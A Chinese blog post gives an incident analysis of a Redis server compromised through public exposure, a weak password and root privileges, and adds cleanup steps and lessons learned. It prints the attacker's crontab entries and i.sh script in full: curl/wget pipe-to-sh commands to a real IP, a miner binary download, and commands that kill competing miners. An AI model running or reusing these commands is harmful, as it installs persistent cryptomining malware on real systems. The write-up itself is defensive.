服务器攻击之reids篇(2018.4.2)

最新推荐文章于 2022-05-10 11:23:12 发布
最新推荐文章于 2022-05-10 11:23:12 发布
阅读量533 收藏
点赞数
分类专栏: Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32642039/article/details/79794387
版权

一、事故原因

开发使用测试机redis
1.开放0.0.0.0
2.密码使用弱口令
3.使用root用户运行redis

梳理一下被黑过程
扫描服务器端口 –> 弱口令拿到reids权限 –> 反弹shell写入秘钥 –> 肉鸡(修改计划任务,挖矿)

贴一下被修改的计划任务,

*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh 

 | sh
*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh 

 | sh
#cat i.sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/crontabs/root
echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

if [ ! -f "/tmp/ddgs.3010" ]; then
    curl -fsSL http://165.225.157.157:8000/static/3010/ddgs.$(uname -m) -o /tmp/ddgs.3010
fi
chmod +x /tmp/ddgs.3010 && /tmp/ddgs.3010

ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

二、漏洞概要

Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将Redis服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下可以利用Redis的相关方法,可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接登录目标服务器。

Redis 安全模型的观念是: “请不要将Redis暴露在公开网络中, 因为让不受信任的客户接触到Redis是非常危险的” 。

Redis 作者之所以放弃解决未授权访问导致的不安全性是因为, 99.99%使用Redis的场景都是在沙盒化的环境中, 为了0.01%的可能性增加安全规则的同时也增加了复杂性, 虽然这个问题的并不是不能解决的, 但是这在他的设计哲学中仍是不划算的。

因为其他受信任用户需要使用Redis或者因为运维人员的疏忽等原因,部分Redis 绑定在0.0.0.0:6379,并且没有开启认证(这是Redis的默认配置),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,将会导致Redis服务直接暴露在公网上,导致其他用户可以直接在非授权情况下直接访问Redis服务并进行相关操作。

三、清理服务器环境

1.修改账号密码
2.清除计划任务被黑部分
3.清除root用户的authorized_keys文件,并严格限制此文件的写入权限。
4.修改redis配置文件限制登录IP,修改默认端口
5.使用redis账户运行。

四、总结

1.不能给运维人员意外服务器权限,特别是生产环境。你不知道开发会装什么软件,是否有漏洞。
2.这也是我一直推荐的,如果不想服务器瞬间崩溃,计划任务要备份或走版本管理方便恢复。
3.一定要严格限制软件的运行用户,不能用root去运行。否则服务被黑了,就会拿到root权限。

五、抽出时间复原了下shell版攻击脚本,有兴趣的可以看看。后续补充python版本

shell脚本实现批量自动redis反弹shell攻击

十月鱼
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
记一次阿里云黑客攻击事件
summer的博客
04-07 8839
这几天服务器一直发生异常行为,阿里云报警如下:根据执行命令:/bin/sh -c curl -fsSL http://165.225.157.157:8000/i.sh | sh 可知道,后台某个进程一直从这个美国的IP地址下载sh可执行文件访问这个地址:http://165.225.157.157:8000/i.sh看到执行语句如下:大概明白,意思是定时从这个地址获取sh可执行文件,然后添加到定...
redis服务器错误日志分析
fxnfk
02-28 3万+
未解决的问题 persistence-available no #不用持久化 maxmemory 4gb #内存限制 maxmemory-policy volatile-lru #内存满时,删除设置了超时时间的那些key的最近最久没有使用的 #save 900 1 #还注释了这三行,这是rdb满足什么条件执行持久化,我觉得有上面的配置这个不注释也可以 #sav...
Redis 4.x/5.x 未授权访问漏洞
roukmanx的博客
12-24 1335
本次对Redis未授权访问漏洞的利用过程做个简单的记录。 前言: 在2019年7月7日结束的WCTF2019 Final上,LCBC的成员Pavel Toporkov在分享会上介绍了一种关于redis新版本的RCE利用方式,这种利用方式更为通用,危害也更大,因此来学习学习 https://2018.zeronights.ru/wp-content/uploads/materials/15-redi...
信息安全 数据赛 铁人三项_2018.6.1信息安全铁人三项赛数据赛题解
weixin_39637711的博客
12-19 952
本文原创作者:一叶飘零目录前言题目描述题目解析(part 1)阶段性梳理题目解析(part 2)题目答案后记前言本场比赛为2018铁三分区赛最后一场,下面是题目分享:密码: v6wu题目描述1.被攻击的两个服务器的内网ip分别是多少,以下简称服务器1和2(格式:空格分隔,按黑客攻击顺序排列)2.两台服务器的主机名分别是什么3.黑客使用了什么工具对服务器1进行的攻击(小写)4.黑容成功登陆网站后台的...
2018.12.4 生活感悟
夜光的博客
12-05 173
夜光序言: 将军,山间朝暮为何?  日月交集,生生不息  人间四时为何?  四季更替,过往迷离  世间情爱又为何?  舍生取义,过犹不及  那将军,您的爱人如何?  活过四季,胜过朝夕  一一我等了那么久  等到这山间朝暮,人间四时  苍老了整个风花雪月  也没等到姑娘回头      一、初始搭建,工作了“好就好久”,有点感受~~ 开始的开始,就是各种框架一搭,然后扔到Tomcat...
2018.6.1信息安全铁人三项赛数据赛writeup
weixin_30387663的博客
12-04 693
链接: https://pan.baidu.com/s/145V_xyiMNOIE5bFbCTtNNg 密码: v6wu 1.被攻击的两个服务器的内网ip分别是多少,以下简称服务器1和2(格式:空格分隔,按黑客攻击顺序排列) 2.两台服务器的主机名分别是什么 3.黑客使用了什么工具对服务器1进行的攻击(小写) 4.黑容成功登陆网站后台的账号密码以及验证码是什么(格式user...
攻击Redis
mole_exp的博客
05-10 1719
文章目录通过写文件getshell通过主从复制getshell参考 通过写文件getshell 通过主从复制getshell 参考 [1] https://paper.seebug.org/975/ [2] https://mp.weixin.qq.com/s?__biz=MjM5Njc1OTYyNA==&mid=2450775177&idx=1&sn=60f333eab252e78452f93c129c566939&scene=21#wechat_redirect [3]
渗透测试-Redis未授权访问漏洞利用
cdyunaq的博客
12-24 1169
危害 信息泄露 系统信息 redis保存的信息 写文件GetShell 在Web目录中写入webshell 写入SSH公钥直接连接 写入计划任务(corntab)反弹shell 高级利用 主从复制getshell(4.x version < 5.0.5) 模块加载执行命令(> 4.x) 环境准备 机型 ip 服务 版本 攻击
linux 中redis使用方法,Linux中redis安装配置及使用详解
weixin_29959549的博客
05-13 531
一、 Redis基本知识1.Redis 的数据类型字符串 , 列表 (lists) , 集合 (sets) , 有序集合 (sorts sets) , 哈希表 (hashs)2.Redis的特性()使用ANSI C编写()遵守BSD协议()支持网络()可基于内存亦可持久化()日志型、Key-Value数据库通常被称为数据结构服务器,因为其value可以是String,Map,list,set,so...
【34】2018年最新node.js+ES+Koa2手把手教你开发一个短视频网站视频教程 .txt
10-04
#### 4. 前后端分离与 API 设计 - **前后端分离**:前端负责页面展示,后端提供 API 接口供前端调用。 - **RESTful API**:一种常见的 API 设计风格,遵循一定的 URL 规范。 #### 5. 性能优化与部署 - **缓存机制...
vue面向切面_从壹开始前后端分离【 .NET Core2.0/3.0 +Vue2.0 】框架之十一 || AOP自定义筛选,Redis入门 11.1...
weixin_39834678的博客
12-20 140
本文3.0版本文章Redis 部分的内容,和netcore2.0一样,不需要更新。代码已上传Github+Gitee,文末有地址传统的缓存是在Controller中,将获取到的数据手动处理,然后当另一个controller中又使用的时候,还是Get,Set相关操作,当然如果小项目,有两三个缓存还好,如果是特别多的接口调用,面向Service服务层还是很有必要的,不需要额外写多余代码,只需要正常调取...
nginx日志报错upstream timed out (110: Connection timed out)
热门推荐
十月鱼的博客(本博客不再更新,作者迁移至:http://wiki.51centos.com)
08-10 4万+
一 、 nginx日志报错upstream timed out (110: Connection timed out)2017/08/04 08:10:06 [error] 27269#0: *34444805 upstream timed out (110: Connection timed out) while reading response header from upstream, cli
SVN报错Warning: post-commit hook failed (exit code 1) with output:
十月鱼的博客(本博客不再更新,作者迁移至:http://wiki.51centos.com)
08-14 1万+
报错内容[root@abc22222222 wechatbi]# svn commit -m “” 1.txt Sending 1.txt Transmitting file data . Committed revision 343.Warning: post-commit hook failed (exit code 1) with output: 在 “/web/wec
nginx日志报错(11: Resource temporarily unavailable) while connecting to upstream
十月鱼的博客(本博客不再更新,作者迁移至:http://wiki.51centos.com)
01-09 1万+
[error] 2312#0: *11017288 connect() to unix:/tmp/php-fcgi.sock failed (11: Resource temporarily unavailable) while connecting to upstream, client: 140.207.54.80, server: phalcontest2.zx04.com, request:
阿里云SLB配置
十月鱼的博客(本博客不再更新,作者迁移至:http://wiki.51centos.com)
03-21 1万+
一、简介 负载均衡(Server Load Balancer)是对多台云服务器进行流量分发的负载均衡服务。负载均衡可以通过流量分发扩展应用系统对外的服务能力,通过消除单点故障提升应用系统的可用性。 二、配置SLB 1.购买SLB并接入交换机 公网SLB是可以直接分发到内网服务器的,这样可以不占用公网带宽。 这里使用内网SLB示例,因为免费。 2.配置后端服务器 (1)环境介绍 ...
批量shell实现交互登录普通用户,切换root用户,并执行shell语句。
十月鱼的博客(本博客不再更新,作者迁移至:http://wiki.51centos.com)
06-08 7846
一、环境介绍 对100台服务器进行登录,增加jumpserver管理里用户。由于所有服务器root禁止登录,导致需要多层交互。 二、思路 1、通过expect批量shell实现交互登录普通用户,切换root用户,并执行shell语句。 2、python实现 三、shell实现 ps:感觉白写了,交互速度大概5秒一台。建议用python实现 [root@jumpserver s...
linux shell命名管道FIFO(多进程动态并发)
十月鱼的博客(本博客不再更新,作者迁移至:http://wiki.51centos.com)
11-24 6998
在shell脚本中,我们想要实现多进程高并发,最简单的方法是把命令丢到后台去,如果量不大的话,没问题。 但是如果有几百个进程同一时间丢到后台去就很恐怖了,对于服务器资源的消耗非常大,甚至导致宕机。那有没有好的解决方案呢? 当然有!我们先来学习下面的常识。1 文件描述符文件描述符(缩写fd)在形式上是一个非负整数。实际上,它是一个索引值,指向内核为每一个进程所维护的该进程打开文件的记录表。当程序打开一
phpinfo显示Scan this dir for additional .ini files (none) Additional .ini files parsed (none)
十月鱼的博客(本博客不再更新,作者迁移至:http://wiki.51centos.com)
11-04 5360
Scan this dir for additional .ini files (none) 设置加载ini文件的目录 Additional .ini files parsed (none) 已经被加载的ini文件 Scan this dir for additional .ini files /usr/local/php56/etc/php.d Additional .ini
redisredis-server.exe redis.windows.conf
最新发布
07-28
引用\[1\]和\[2\]提到了在安装目录下运行控制台,输入redis-server redis.windows.conf来加载redis.windows.conf的配置文件。而引用\[3\]中也提到了通过命令行CMD加载配置文件(redis.windows.conf)来启动redis。因此,要加载redis.windows.conf的配置文件并启动redis,可以在命令行中输入redis-server.exe redis.windows.conf。 #### 引用[.reference_title] - *1* [redis.windows-service.conf和redis.windows.conf的区别](https://blog.csdn.net/lizeheng/article/details/126748523)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [我们一起来学习redis吧【redis的启动和关闭,配置文件详解】【redis.windows.conf和redis.windows-service....](https://blog.csdn.net/summer_style/article/details/106534996)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值